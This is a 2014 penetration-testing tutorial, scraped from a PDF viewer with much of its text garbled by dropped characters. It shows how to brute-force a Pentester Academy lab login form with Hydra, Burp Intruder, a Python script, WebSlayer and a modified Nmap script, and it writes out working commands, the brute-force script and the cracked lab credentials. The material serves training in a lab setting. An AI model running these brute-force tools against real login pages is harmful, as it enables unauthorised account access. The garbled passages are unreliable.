1. web-form brute force methods-libre

8/10/2019 1. Web-Form Brute Force Methods-libre

http://slidepdf.com/reader/full/1-web-form-brute-force-methods-libre 1/58

All information contained in here are for academic research, web application exploitation research, bug

hunting research, laboratory test bed uses, and for educational purposes only. The techniques shown

hee aet desiged to opoise lie ahies, e appliatios o a host. These tehiues ae

laid down on purpose for awareness and research, thereby the authors are not responsible for the

actions conducted by individuals in any form. Neither this document is transmissible or re-useable,

itte peissio fo the authos is a ust, failig to hih etai legal atios ight e pooked.

Web Form Brute Force MethodsDemonstration by Shritam Bhowmick

Web Application Penetration TesterIndependent Consulting Security Evangelist

Dated: 6th August, 2014, Springs, 4:00 PM IST



Web Application Exploitation with Shritam Bhowmick 2

This is web application penetration testing challenges hosted over pentesteracademylab.appspot.com, it

reflects several challenges for web application security researchers to break in a safe environment. This

is for Lab practice only and no part of this document were provided by the original authors.




Contents

Hack ............................................................................................................................................................... 4

Method 1: Using Hydra to Brute Force Web Logins: .................................................................................... 8

Method 2: Using Burp Suite Intruder to Brute Force Web Logins: ............................................................. 13

Method 3: Using Python to break Web-Form Login: .................................................................................. 32

Method 4: Using WebSlayer to Brute Force Web Logins: .......................................................................... 38

Method 5: Nmap Script Code to break web form: ..................................................................................... 48

Contact Information .................................................................................................................................... 58




Challenge: Use Brute-force methods to hack into the login pages.

Target: http://pentesteracademylab.appspot.com/lab/webapp/1

Topic: Using Crunch and Brute forces on Web Application Web Forms.

Hack

Hack: So, the usernames are jack and admin for the challenge which were provided to us as a hint. We

have to create files for the users. Could be done on Linux by issuing the following commands:

#echo -e [email protected] \\[email protected] > users.txt

Note: eho ith -e sith is used to esape the \ hih is euied fo a lie feed. Also, a [spae]

ist appeded eause of the sae easo that itd eate a e lie ad stat itig fo the e

first instance without any spaces involved.

Generating custom password list with 5 minimum and the 5 maximum size with xyz as the character set.

Cuh: ed use uh to geeated ou o usto passod list, passods ould e fethed i

http://pentesteracademylab.appspot.com/lab/webapp/1







case there were no hints provided, we could also later use Hydra to generate a username/password list

pio to ute foe attaks ut hee to keep thigs at ease, ee used uh. Note that fo e

appliatio hih do ot hit ou athig, ad oud ot epet a iiu o aiu legth fo

haates, o eithe the haates hih ae eig used fo the passod at the fist plae, use

fuzzdb. This includes usernames and password files which were pre-generated by the community for the

community of hackers. Use fuzzdb, for other injections as well, use if for dictionary attacks, if yououldt at a hid ased ute foe fo log eas usig a lo-end spec system at your disposal.

To generate passwords using crunch, which has minimum 5 characters and maximum 5 characters as

depicted by at the hit fo this patiula hallege, ith the haates theseles estited to ,

ad z, use the folloig oad at the Liu oad lie, o do ash opeatios. Athig helps!

#crunch 5 5 xyz > passwords.txt

What we have is a list of users and the list of password set. Look at the URL and see if the parameters

ae eig passed at the U‘L, if it is, its a GET ased euest. B default if the page soue doest

desie a ethod, its take as a GET ethod. To deostate this, input any dummy characters in

the input fields:

https://code.google.com/p/fuzzdb/






The paaetes as ell as thei alues ae efleted o the U‘L hih ofos its a GET euest hihis sent by the client to access the resource:

Now, if this is verified from the source, after we try to login, we will see there is no method described at

the source page, which means again that the default (if not specified by the source), the method would

be GET request:




The username hints and the domain given were jack and admin as users and domain as

pentesteracademy.com so possible username sets would be:

[email protected]

[email protected]

Now, that we have the valid usernames (before we used nick and admin to generate the username files

as an example which were invalid), we need to go and brute force the login with these set of charactersof useaes ad the geeated list fo passod takig , ad z ith iiu haates ad

maximum 5 characters as our password list. For this, there are four methods we can accomplish the

brute force on web applications:

1.)

Use Hydra for Brute Forcing

2.) Use Burp Suite as a web-client proxy for Brute Forcing with Intruder

3.) Using python scripts and designing a python script which goes ahead and brute forces the login

4.)

Using WebSlayer with Hydra generated password lists

5.) Using power of Nmap Scripting Engine to facilitate web form bruteforces.

mailto:[email protected]









Method 1: Using Hydra to Brute Force Web Logins:

About Hydra:

For web-based forms, you have to know much more information about the form you are attackingbefore you start the attack. Every web-based form is slightly different, different URLs and parameters,

and different responses for success or failure.

You need to know:

The hostname/IP and URL

Whether it is a HTTPS or HTTP service

Whether the form supports GET or POST (or both)

The parameters of the request

The difference in response between success and failure

Whether any session cookies are required to be set or maintained

What lockout features and thresholds are enabled (if any)

Now for an example consider the form fields, described below in the image:

Here consider the following:

1.)

Hostname: the hostname would be your target hostname, or an IP. Just that.

2.) URI: The Uniform Resource Locator would be the resource where the form could be located.

3.) Method: The method shown in the image is POST, but in

petesteaadela.appspot.o/la/eapp/, the oe ee ito, its GET, so ed use GET

rather than POST there.

4.)

Also, the URI or the URL rather is cut out from the rest of the host information and kept

subjective in enclosed double quotes.




5.) Hydra basically iterates through all the username/password combinations, until it gets a

response that does not contain the text blacklisted text or it does contain a whitelist string if

whitelist string is provided.

6.) The blacklist string would be the string that comes up if the user is not authenticated and throws

out a stig hih hda a pik up ad log, this ould e the stig hih if Hda does ot

fid, ill assue that its logged i ad log the useae ad the passod et hih eesuccessful in bruiting the web-login

7.) The whitelist is a different scenario and if Hydra has to detect web-login authentication success

proving the string by which hydra determines that it was a valid string, hydra will go ahead and if

any such whitelist is found, hydra would log the credentials for that very request sent i.e.:

username and the password for that request (POST or GET).

Not knowing or understanding the above information can be a big cause of failure.

The host is penesteracademylab.appspot.com

Its a GET ethod, so pik up the http-form-get eause its e fo as ell.

The U‘L o oe speifiall the fo fields situated i /la/eap/ i this ase.

With the form fields been set, append the email (users for authentication) and the passwords

with the appropriate user and password lists and note that this would be done in continuation

of the form fields in order to complete the form itself. The form fields declaration in hydra

ould e elosed i doule uotes: /la/eapp/:eail=^U“E‘^&passod=^PA““ ̂

We use eail ad passod as ou paaetes hee eause the source code has the email

and the password as its entry, if it were a different application, this might change!

Anything in-between ^_____^ specifies that hydra needs a feed into these places which turns

out to be username files and the password files respectively. Notice that there are more




paaetes hih hda eeds to ute foe e logi fos hih is the easo, the doules

quotes are not closed yet.

The parameters are separated by colons (:) and the next step is to let hydra know when the

login goes success, for an instance while login, if a user fails to get authenticated, Hydra takes a

laklist stig like Failed o Authetiatio Failue as the stig ad detets if these laklistods do ot appea, the its a suessful logi, so ed hae to apped that as ell alog ith

the /la/eapp/:eail=Û“E‘^&passod=^PA““^; hih ould e doe e appedig et

another colon, for an example /lab/webapp/1:email=ÛSER^&password=^PASS^:laklist

stig

So for now, our whole query for hydra would be: hydra pentesteracademylab.appspot.com http-

form-get la/eapp/:eail=Û“E‘^&passod=^PA““^:Failed

Notice that the query ends now with the doubles quotes in place, we also mentioned the black

list stig to e Failed because in this web login, any failed login attempts generates the string

Failed! Please T Agai! hih ould e see elo:

Alteatiel e ould also poide hitelist strings in case we know the successful attempts

would look like, and the application never throws any strings on unsuccessful logins on web

forms. Now, if we are running Hydra from the directory where our users and password files

which were generated are stored, we could provide the users and the passwords list as it or

show the directory path for login users using the –L switch and password list using the –P switch,

which is: -L users.txt –P passwords.txt




Next, we would also add threading because hydra supports parallel brute force power and 20 is

the maximum allowed integer for this with the –t switch

At last, we include –o sith to sae the esults i a tet file alled esults.tt

Final Query for Hydra: hydra pentesteracademylab.appspot.com http-form-get"/lab/webapp/1:email=^USER^&password=^PASS^:Failed" -L users.txt -P passwords.txt -t 20 -o

results.txt

This will fetch the valid logins and the passwords, if found using a blacklist string and store the results to

a tet file alled esults.tt.

#cat results.txt

Ad oull poal fid the useaes ad passods. Try them all in-case hydra goes wrong. For me,

the results looks like the following after Hydra went ahead and brute forced the web-login and hence

one of the username and corresponding password worked in the scenario:




That was for Hydra, but as we look here that Hydra is efficient and could get number of results and could

go wrong several times without any hints, there are some other ways we could accomplish this same

task, ell use ethod hih iludes usig a lient side proxy with Intruder attacks using these same

files geeated ith Cuh at ou disposal. Befoe e egi ith Bup, ell go though soe of the

basics for Burp which an attacker might need to now beforehand. If you are looking for a detailed

discussion on Burp Suite, refer to my other papers which goes deep into using Burp Suite as a Web

Application Swiss Knife, or use the compiled book delivered by me which has a section on Burp Suite and

using the tool to make most of the benefits.




Method 2: Using Burp Suite Intruder to Brute Force Web Logins:

About Burp Suite:

Burp Suite was designed by Portswigger to formulate a client side based web-proxy which assists

interception of HTTP requests and responses along with support for intercepting web-services based

traffic such as WSDL. Burp Suite has been written in Java Platform and provides extensions for various

other script with the help of Jython based platform which includes using Python scripting written for

Java. Most interestingly Burp Suite provides a framework for web security penetration testers to

intercept HTTP traffic, debug application, as well as black-box test web applications with included tool-

set like ‘epeate, Itude, Copae, Deode, and much more. The scope of this section covers

the Intruder, if you are interested in learning Burp Suite in details, there is a separate book written by

me on it and you could use them to expand your knowledge on this framework which would be

extremely helpful.

To use Burp Suite to the full extent, provided you have good VRAM storage, the following configuration

via command line on Linux would help start Burp Suite, which is included in Kali Linux already. This

version is the free edition of Portswigger Burp Suite. For Professional version, which penetration testers

use, oud euie to u a liese. Go though the Potsigge FAQ to know more.

Launching Burp Suite from the Linux Terminal with known good configuration:

Locating Burp Suite on Linux if installed:

Launching Burp Suite JAR file with good known configuration allotting 2 GB of VRAM on Java

Memory Settings on Linux:

http://portswigger.net/



http://www.w3schools.com/webservices/ws_wsdl_intro.asp



http://www.jython.org/



https://www.python.org/



http://portswigger.net/burp/faq.html











Accepting the Burp Agreement and proceeding further:




The Intruder Tab is loated afte the “ae Ta, hih ed use fo ute foig the e-

form, this will make use of the generated previous usernames and the password list via crunch. But

efoe athig else, ed euie to setup the up listee to liste o poided HTTP port andforward out HTTP packets through Burp Suite Proxy. This requires configuration on the browser

because the HTTP packets requires to be forwarded to Burp via the browser, for this; go to:

Firefox/Iceweasel Preferences > Select Advanced Tab ad fid the Po “ettig, he this is doe,

the next step is to configure the browser to the below specified ports for Burp to intercept traffic:

After this has been done, anything that you browse via the browser will forward HTTP packets

(requests and responses, if responses are set to be intercepted) via the Burp Proxy which is newly

ofigued. To ake sue of this, o Bup “uite, go to the Po Ta ad ake sue Iteeptio is

set to O.




Bose the taget site, i this ase its http://pentesteracademylab.appspot.com/lab/webapp/1 ,

and note that the Proxy Tab now blinks and asks if any modifications are needed before forwardingthe requests to the web-server:

Click on forward and let the request be sent to the web-server and until the request is not

forwarded, the browser will wait for the response from the web-server. In-case Burp is configured to

iteept the esposes as ell, itd go ahead ad iteept the esponses before forwarding it to

the browser for web-page presentation. Now, that everything is ready, and the browser has the

response, we will use a junk values on this target to capture the HTTP request and send it to

Intruder when the proxy tab blinks next, for this enter any junk values in the web-login form fields

and hit sign in to start sending the HTTP request:








Once, the sign-i is hit, the po ta ill ask fo a odifiatios if eeded, hee ed eed to

right click the request heades ad sed it to the Itude, so e ould ute foe the fo

fields:




The Itude Ta o liks, ad ed eed to aigate to the Positios setio fo additioal

modifications like where our given payloads would land for the customized attacks:

Burp Auto-detects the form fields where the usernames and the password might be possibly

injected, we can change this to our liking but the default payload set by the special characters in

burp such as anything enclosed in $ an $ in this case is the suitale seaio; ell hek the

luste o attak tpe eause e hae to fields hih e eed to attak, fist oe eig

eail hee ou useae paload ould fit ad the seod eig the passod hee ou

generated password file from crunch will fit; the Sniper attack type is for one payload at one

field at a time, which is false in this case:




Remember, we have two payloads, one for usernames and another for passwords. From here,

e ill go to the Paloads setio of Itude ta ad use “iple List as the Paload Tpe

ad use Load fo the Paload Optios to load ou use geeated list file:

Clik ope ad Bup ould set the uses.tt file fo paload hih oespods to the eail

field. Next, we also had second payload which needs to be set, the password.txt which weregeeated peiousl Bup, fo this, ed selet Paload “et to ad the hoose

appopiate opeatios hih e did fo Paload ut hee ou file ill e the geeated

password list via crunch:




All paloads hih fa e et though ee “iple List, eause the ae aiage-return

sepaated files hih otai useaes fo the eail filed ad passods fo the passod

field which we previously enumerated looking at the form-fields from the source page.

When everything is set-up, e ould euie to aigate to the Itude optio fo the

menu-a ad lik o “tat Attak, folloig hih Bup “uite ould go ahead usig its on

browser user-agent engine, parsers etc. and brute force the form fields:




As fo o, e ould see that the Itude had stated ad is ute foig the e-form.




Next is detecting the successful logins, if any. By default any credentials you throw at this

patiula e appliatio ill feth ou a OK espose ith the ‘espose Code eig

, ad the ‘easo eig OK look at HTTP ‘FCs fo oe details ad at the gie HTTP

document by me). Now, unsuccessful logins will e gie OK espose, ut if e ouldsoeho eliiate fo the olu ta, hat ould e left is the status ode iludig

3xx which would be redirect responses, 4xx which would be bad client side errors, 5xx which

would be any server side errors. Beyond that 2xx are informational, which in this case needs to

e eliiated, e hek ith this appoah fist; to do this, e hoe oe the Filte hih

uetl sas “ho All, left lik ad de-selet ‘esposes, ad o ed e left ith 3xx,

4xx and 5xx responses only:

No, Itude shos, its hidig a ifoatioal esposes, ad shoig us , ad

5xx responses:

But, e haet ade still eause e see thee ee o esposes hih iluded a

redirection which could hint us with a successful login or anything which might hint a successful

Brute force of the provided credentials for this attack.

What else could be possible scenarios to look for a successful login? This could be the received

content-length header. Now, the next tactical concept is, we receive 2xx for all successful logins

as well as unsuccessful logins, nothing is being redirected which is the reason there were no 3xx

status codes on completion of brute force; but we see that the content-length for all the

esposes hih ee set ee sae, this is poided the Bup Itude usig the Legth

olu o Itude upo statig the attak :




We de-selet the oes e do ot eed, pefeal, pesoall Id de-selet euest, eo,

status, tieout, oet ad athig else eept the paloads Bup ade usig the

custom tailored payloads and the Legth. Beause Legth is hat e eed fo fous, ad

status ist the oe hee ad hee e eai ol ith the paloads ad the otet-

length which came with the response header:




Now, closely looking at it, and scrolling down from the numerous requests made by Burp, we get

a eeptioal Legth alue hih has a diffeet alue fo the othe idetial oes.

This is where we need to stop and inspect:

The legth alue is diffeet, ad the paloads hih ee the edetials fo eail and

passod ee [email protected] ad zzz espetiel. Upo ispetio o

the espose ta, ad lookig at the ‘ede ta, the Bup Bose Egie ill ede, ad e

can be presented with how would it look if an user submitted those credentials:




And that meant the challenge was cracked and we could use those credentials to verify that

useae as eail ee [email protected] ad passod used fo this

patiula eail as zzz as passod as pe the GET request parameter).

Go to Bose pefeees, use the o-po so ou ould oall ose all sites ad pess

OK fo Bup ot to iteept, o alteatiel, go to Bup “uite Po Ta, ad lik

Iteeptio Off to disale iteeptio of any traffic. Another alternative method is using an

addo alled sap-po ad othe addos siila:

Render the original target page at http://pentesteracademylab.appspot.com/lab/webapp/1 and

enter the credentials Burp had cracked using Intruder:








Ad, oull get the ogatulatios hih eat, the edetials ee aked ad suessfull

bruited using Burp Suite Client Side Proxy usig Itude ad usto tailoed paloads.

Alternative to using Crunch: If Crunch is too much pain and making dictionaries automated is the

goal, Burp Suite as a framework could be used to make dictionary files automatically using the

Itude ta, hees ho oe ould go ahead ad autoate the ditio geeatio usig ,

ad z as haates ad passod opleit set to iiu ad aiu fo these

characters:

O the paload ta, set paload tpe t siple list ad auall add the useaes hih

hee as a eaple ould e [email protected] ad

[email protected]:




Clik add ad otiue addig the useaes to ou ofot, the et oe shall e

[email protected]:

Notie that peious useaes ee added, o selet Paload “et to ad selet Paload

Tpe as Butefoe:




Well use the haate set as z i this deostatio eause thats the set of passod

characters being used, make sure in any other scenario, you need to determine this and add

these charactes to the likel seaio, o if thats ee set, set the Mi. Legth to ad the

Ma. Legth to eause thats the passod opleit fo this deostatio. Eethig

happes i the Paload Optios fo Bute Foe set to the Paload “et




Afte eethig is set up ad doe, go to the Itude o the eu-bar discussed before and

start the attack, the results would be the same. Check the content-length as discussed before

and look for the responses which renders the granted access.

The ‘ede ould o ede the epesetatio of the HTML as a ose egie ould ad

we can therefore determine that the password were indeed cracked via Burp Intruder. Now,

thee used to e aothe alteatie ethod hih uetl is epeietal ad doest ok

popel usig the ee esios of oses o Fiefo, pefeal ade fo Fiefo as a .pi

addo, this addo as alled FieFoe liked efeeed at:

http://www.scrt.ch/en/attack/downloads/fireforce

Documentation for usage of Fireforce as a web-form login bruteforcer could be found here:

http://www.scrt.ch/outils/fireforce/fireforce_en_manual.pdf

An added reference for Fireforce and how it does, what it is supposed to be doing could be

found here: http://www.securityaegis.com/easy-breezy-beautiful-password-attacking/

The ethod fo this as ot iluded i this douet eause Fiefoe feezes o age

operations on newer firefox web-browsers. As soon as Fireforce releases a stable version foree esios of Fiefo, itd likel e iluded in this document. Next, we will look at

developing a python script to break the password, using python libraries. For python, first step

would be to learn python, because without knowing python libraries and how python works,

oe ouldt e ale to automate all of this developing his/her own scripts. To be able to

autoate etai e appliatio eploitatio, peetatio testes use ptho sipts hih

they develop out of their own expense of free time. This would be shown in the next method,

but it is recommended, people learn python to be able to understand whole of it.





http://www.securityaegis.com/easy-breezy-beautiful-password-attacking/









Method 3: Using Python to break Web-Form Login:

About Python:

Using version 2.7.3:

Python terminal:

#python




Exiting Python terminal command-line test environment: #exit()

Eough of the asis, its tie to deelop a sipt hih alls the ptho eeutale fo the

Linux and loads up for the script we develop before it could do anything with the script. For this,e use the shebang to ake sue efoe eeutig ou ode sipt, the Liu eioet

ipots the ptho eeutale fo /us/i hih has a file alled ptho, ed hek hat

this file is and learn to locate or find where python is issuing the following commands, but first

e eate a file alled e-form-ute.p usig the touh oad, so late e a stat

writing our code here:

The loate oad ould geeate uh oe esults, ut fo eeutales, ed use the

heeis oad to fid hee ptho ould e so that late e ould use this dieto to

all the ptho eeutale usig sheag efoe the loated file ad the otiue itig

our code:

http://en.wikipedia.org/wiki/Shebang_%28Unix%29







At this point, we have many versions of python istalled, the default ed pik up is the oe at

/us/i/ptho. No to use the sheag hih is epeseted #!, e ould hae to fist

use a text editor to first open the file which we had created:

We use ao, a tet edito hih is GNU ased in Linux. Other options on Linux are pico, vim,

gedit, leafpad and emac. There are ton of text editors available, once loaded, the screen

popts us to ite tet ito the edito see, hee e egi ith ou sheag to ilude thepython executable:




The code:

#! /usr/bin/python

from urllib import urlopen

import itertools, sys

def gen_passwords(universe,l):

# use itertools to create a list of all password permutations

wl = []

for i in itertools.product(universe,repeat=l): wl.append("".join(i))

return wl

def brute(username):

root_url =

"http://www.pentesteracademylab.appspot.com/lab/webapp/1?email="+username+"@pentesteracademy.com&password="

# want to be able to enter a password on the command line and only send thatone test

if len(sys.argv) < 2:

wl = gen_passwords("xyz",5)

else:

wl = [sys.argv[1]]

for pw in wl:

full_url = root_url+pw

p = urlopen(full_url).read() if not "Failed!" in p: # success

print "Username: ",username," Password: ",pw

break

else:

print "Password: %s failed"%pw

brute("admin")

brute("jack")

http://www.pentesteracademylab.appspot.com/lab/webapp/1?email=






The Python Code:

oot_ui ould e the hole GET U‘L hih ould the take useae from the defined

useaes hih ae jak ad adi fo this deostatio, the def futio ute does this

jo. Also e use itetools as ou lia to iteate. The defied futio alled ge_passods

takes care of the loop which generates a peutale list of , ad z fo iiu to

aiu haate list ad the heks the uted passods hih did ot geeate Failed

string and hee tigges the suess appeded to the uted list of passods. Befoe oig

futhe hod + the ptho ode file to eeute:

Net, use ./e-form-ute to eeute the ode file ad u the sipt:




The sipts egis the utefoig ad util e see the suess stig appeded to the

generated password of password complexity 5 minimum and 5 maximum, we have to keep

looking at the results. Once Bruteforce gets over and the script has been executed, check

through the logs generated (for this once could had redirected the output to something like:

./web-form-brute > results_brute.tt fo the eeutio poit ad look fo the suess stig;

hoee, e do get the suess stig hee hih ould e useful fo a suessful logi:

The passod is zzz ith the use eail eig used as adi hih eas

[email protected] ould e the eail fo the logi fo. Use ith the passod

generated and we will get a successful login:




Oe just eeds to tigge eslae fo his/he teial the a its sho aoe.

Net, ed see a see ith diffeet tas hih epeset aftigof different types of

payloads and ton of things by which we can generate our own custom payloads and brute using

these generated payloads:

Capture the request by LiveHTTP Headers which just gives an easy way to input right headers

which would be thrown this fuzze. The addo ed e usig hee is Lie HTTP Heades

which is available in Firefox or any other tool-set which has the same functionality like Burp,

Fiddler, Charles Proxy and many more. If Live HTTP Headers is installed in Firefix (or Iceweasel),

bring it up from the menubar, goto tools and click on Live HTTP Heaaders.




Make sue the Captue is tued o ad efesh the page fohttp://petesteaadela.appspot.o/la/eapp/as shown below:

When done, the page refreshed and all the packets along with the headers went through the

Live HTTP headers and hence Live HTTP Headers captured the HTTP headers because it was set

to Captue, ou et oe is to op all these eat heades hih ee sent by the original

browser client to Webslayer to pretend to be an original client as an original browser client




would be.

This as the e fist euest hih the liet ade, ad hee, e lik o ‘epla to see o

copy or replay the original set euest et agai. Afte likig o the ‘epla, soethig like

elo pops up:




We do ot eed a PO“T data to e set eause the fo does ot hae PO“T ealed to it.

This is the attack pre-setup, now, before we generate out payloads, we need to set the keyword

FU)) to the heades, paaetes o a field hee ed like We“lae to ute ou

geeated lists of useaes o passod. I Weslae, oe eeds to ko the useaes to

brute the passwords (which is the limitation) but in this case to demonstrate how an attacker

tool-set is used, e alead ko the useae hih is [email protected] adwe need to generate password list of minimum 5 and maximum 5 with the help of WebSlayer.

Hee, e ko the paaetes hih ed e tig to ute is a GET request with parameters

eail ad passod. We also ko the eail paaete ould take

[email protected] ad passod is the paaete ed eed to fuzz; so ed

quickly change the URL from the Webslayer to suit our needs (notice the URL, when we put

juk alues ito the logi fo usig oigial ose, the ose geeates a GET ased U‘L

which reveals the whole URL):

“o, e feed this U‘L to the We“laes U‘L ad ake soe hages, ell see hat ae the

changes which is required. For now, we just need to copy this GET based request to WebSlayer.

No, that the oigial GET ased euest had ee fed to We“laes U‘L ta, e eed to

make the changes to these parameters:

a.) email

b.) password

We know the usernames to e [email protected], ad e eed to FU)) the




passod paaete, so the alue fo eail paaete ould e

[email protected] ad the alue fo the passod paaete ould e FU))

since we need to brute this parameter in order to determine the credentials; so the URL

eoes ot that FU)) is a keod, athig ou put the te as FU)) ill e take as a

target input feed for Webslayer.):

Notice the changes made to the URL for WebSlayer to be configured so that it could take

[email protected] as the useae ad the paloads e geeate o the

passod paaete. The alue of the eail paaete eais itat.

After this initial set-up, ed eed to geeate a passod list, selet the Paload Tpe as

Ditioa as shown here:




I this attak, e ae usig the Ditioa passods file peiousl eated eause afte a

thoough iestigatio, I foud that e aot use the paload optio sie the paload fails at

generatig the iiu ad aiu haates usig oiatio, it ol suppots

peutatio ith a fied idth tpe alog ith the gie haates hih ae , ad z.

“o, oe e the Ditioa attak tpe is seleted, e ould geeate the list via crunch; here

ell use the peiousl geeated list. Load up the list likig o the … optio ad selet

the list file. The list file hee is aed as passods.tt:

Afte opeig up the list hih is passods.tt, lik “tat:




Oe “tat is hit, e ae take to Attak ‘esults ta:

Belo e a “top o Pause the uet attak ad see the paload poessig:

Oe, eethig fiishes, a gee stig ould sho up the suessful eak do of thepassword ith the gie eail paaete alue as [email protected] ad

passod alue set to FU)) to go though the paload poessig:




Hee e see that the Paload zzz as stig ith its MD oked, fo hee, e a hit o

‘espose HTML to eif if the passod ith the supplied useae logi as aked:

Use the sae Paload etated at this point to login via the original browser, and same resultsould e ahieed. Hoee, thee ae plet uh oe optios i We“lae in the

Paload Geeato ta, hee apat fo doig oiatio ad peutatio geeatio, a

variety of possible payload generation could be done which includes Block payload generation,

credit card payload generation, username generation which could be taken for the

eueatio pat ad ueial paload geeatio:




improvements to the Nmap Project. Nmap is both available for Linux, as well as for Windows. It

also works with Mac but with various lags in speed. Benchmarks proves Nmap is slower in Mac

rather than on Linux based operating system. There is a whole documentation available on

Nmap and how to use it which could be found here. Hees a book Fodo hiself o Nap.

In case anyone needs a very thorough understanding of Nmap, follow the book. If you need this

only for penetration testing task or as a tool-set fo uik dit petest ased out of etok,mail me at [email protected] ad thees a ogoig eseah document which I

had been preparing.

Nap a sa fo ope pots. Ca detet host opeatig sste eotel. It also a detet

application versions, and has signatures preset for recognizing application, OS and other

daemon versions. It does host discovery, operating system enumeration, and report generation

using XML standards and firewall evasion on the go. It has both CLI and GUI versions. The GUI

esio of Nap is ko as )eap. Whe its saig ad etok eueatio,

fingerprinting, Nmap is the first favorite choice of any dedicated red team using this tool as an

army Swiss knife (same goes for Netcat!).

Nmap has an engine called Nmap Scripting Engine (NSE). The engine is documented here and is

written in Lua language. Apart from Nmap itself, NSE provides the flexibility to separate

additional tasks like automating an exploit, actually exploiting a target and provides a range of

capabilities such as enumeration, vulnerability detection and much more. Read the

documentation. Also, in kali Linux, which has been an operating system based out of Debian, the

Nmap scripts resides in /usr/share/nmap/scripts directory:

Before we go into opting NSE engine to bruteforce web based form logins, there are certain

thigs hih oud eed to ko:

1. The NSE is completely community based and written in Lua.

2. As of 2014, August, there were no such scripts written in Nmap which assisted

utefoig e ased logis usig GET ethod.

http://nmap.org/bennieston-tutorial/



http://localhost/var/www/apps/conversion/tmp/scratch_5/nmap.org/book/






https://media.blackhat.com/bh-us-10/whitepapers/Vaskovitch/BlackHat-USA-2010-Fyodor-Fifield-NMAP-Scripting-Engine-wp.pdf










3. I had to manually change code for Lua in the NSE file and implement into a current

okig sipt fo Nap hih as http-form-ute.se. Cedits to nnposte o

Nmap development.

4. B default, as of , August, this patiula sipt ol uses PO“T method and there

is o suppot fo GET ased e fo utefoe ad hee the ode eeds to emodified in order to support both methods.

5. This ode hih ill e doueted hee ist a pat of peetatio testig ad is

wholly devoted to scripting the NSE and then using this newly developed/modified Lua

ode sipt to idetif GET ased fo authetiatio ad assist utefoig the.

6.

The script will be covered here and this might be on patch release later and hence the

original script would require a backup before we use our own script in Lua making

modifications to the original code.

7.

NSE uses script arguments so there are different script arguments for different scripts.

The code which would be presented here adds yet another argument to the list apart

fo hat as oigiall offeed. Its eause the sipt poided suppot fo PO“T

ethod ad ot GET, so odifig the sipt to ou o eeds, I had to go ahead ad

add a additioal aguet set alled http-form-ute.ethod hih takes iput as a

GET o a PO“T to ake sue that the euest ethod is delaed efoe e stat

bruteforcing the target application.

8. The modified script itself is not stable as for now. It gives false positives which is

currently being worked against. But with several test, it showed 70% positives with the

tested methods above which proves that it could crack credentials. If the credentialsgenerated by this script goes wrong, trial and error is used against the application to get

the right credentials. Nmap developers are fixing this.

9. Update Nmap script database at a later time (with this revision after 2014) to make the

est usage. This is the fist ee doueted sipt ad a futioal oe fo the

attept e ae goig to ake. Dot fous o the sipt and move direct to the

petest pat if ou do ot udestad Lua o at ode oe.

Backing up the original script is easy, you would require to copy the existing original script and

store it in the same directory for later use:




Now one would require to update the original script with the following code provided here. A

raw version could be found here. Since we had backed up our original script code for http-form-

brute.nse, we can go ahead and replace the original script code with the scrip code which has

been provided here because this new script provides new functionality including choice of

PO“T o a GET as a HTTP euest.

Copy the code from the raw version of the ASCII text code in Lua provided here and paste in to

the edito of hoie. Make sue the ae stas the sae that is http-form-ute.se. Aftepastig this e ode, CT‘L+O to sae the ode i ao ad hit aaige-etu i.e: Ete,

and then again CRTL+X to exit the editor. The following screenshot shows the demonstration of

the ode hih has ee deeloped usig ao as the tet edito of hoie. Fo e uses,

leafpad which comes Along with Kali user would be great, or gedit which could be installed via

apt-get istall gedit o oad lie.

Its eoeded fo epeieed Lua odes to go though the ode ad odif if a hages

are needed. This belongs in accordance to the needs of the pentester. Also mail me if there is

soethig ou odif, sie Id e iteested to keep tak of the hages i the ode.

http://pastebin.com/DmQ04VqZ



http://pastebin.com/raw.php?i=DmQ04VqZ








Now that we have everything setup with the replaced code, we need to trigger Nmap from the

oad ad set up a afted Nap N“E sipt ith aguets. The sipt aguet is

something which most find tricky. Keeping everything aside, when you realize the way Nmap

scrip arguments are passed via the CLI, the true power lies there for quick exploitation as well as

quick tests. NSE provides a variety of lists for checks, exploitation, enumeration and a vast

dataase fo autoatig tasks. This douet agai does ot disuss Nap i detail, Id athe

jup oe to usig N“E fo utefoig e appliatio fos hih ight e GET ased

HTTP request. A GET euest is soethig hih is ipited o the U‘L, hih i this ase is:

https://pentesteracademylab.appspot.com/lab/webapp/1?email=test&password=test

Both, useae hih is eail paaete ad the passod, hih is passod paaete is

eig passed i lea tet o the U‘L hih eas the euest ethod is GET. This ould also

e eified usig the ie-soue hih as disussed ealie in this document.







Koig to tigge Nap ith -sC sith ad usig —sipt ith —script-ags. Thees a

diffeee uig the -sC sith ad tagetig a speifi appliatio usig a speifi N“E sipt.

The geeal -sC sith ill do a default sipt uoe, hih ould e euialet to —

sipt=default.

After application has been mapped, to use the power of the NSE script to our advantage, we

need a more specific script which we had developed earlier in the Lua code to be ran over by

Nap. I ode to aoplish this, e eed to tigge the sipt ith —sipt= dietie ad

etioig the sipt ae. Nap takes ae of the est ad autoatiall is sd ith the

/usr/share/nmap/ scripts directory and hence would not requie a .se etesios to e

poided he aig the sipt. Fist, the ai taget is speified alog ith the pot to e

targeted, web-see us o 8 default ad ou taget petesteaadela.appspot.o

have the same port open which serves web-content or which is running an HTTP server. Hencewe have more number of script arguments which are newly introduced from the script, these

are all the arguments one needs to pass to the script (http-brute-form.nse):

1. http-form-brute.hostname – Specifies the hostname.

2. http-form-brute.path – Specifies the path URI.

3. http-form-brute.method – “peifies the e o ethod.

4. http-form-brute.uservar – “peifies the ae of the fo field fo useae.

5. http-form-brute.passvar – Specifies the name of the fo field fo passod.

6. Userdb – The database of line feed usernames for bruteforce.

7. Passdb – The database of line feed passwords for bruteforce.

Hee these aguets ae supposed to e etioed i the afted ue fo Nap he —

script=http-form-ute ith —script-ags is delaed. All of the sipt ags ae ude .

Since we now understand the format to specify the Nmap arguments. I need to show some of

the common mistakes one could run when writing the query for Nmap. These are stated here so




these mistakes could be dealt with no time and when the audience writes the query for the first

time, he/she feels confident enough. Some of the mentionable while write the script argument

queries are the following:

1. The –script=script-name-hee delaes the sipt a attake is usig. Hee its http-

form-brute and hence this would be –script=http-form-brute.

2. To specify specific arguments to the script which we require here, one needs to declare

the –script-args=aguet.speifis=alue,

aguet.speifis=alue hih the takes all the aguets ude

(single quotes) and within this singles quotes are the argument names like http.form-

brute.method, http-form-brute.path, http-form-brute.hostname and everything else. All

the argument names are separated by , (comma).

3.

The alues of the desied aguet aes ould e ude doule uotes as

shown above in point [2]. Apart from this, the userdb and the passdb in this scenario

takes the iput fo a file ad hee thee is o doule uotes. Although double

quotes could be provided.

4. Usig - sith efoe statig the sipt aalsis eas the attake doest at to

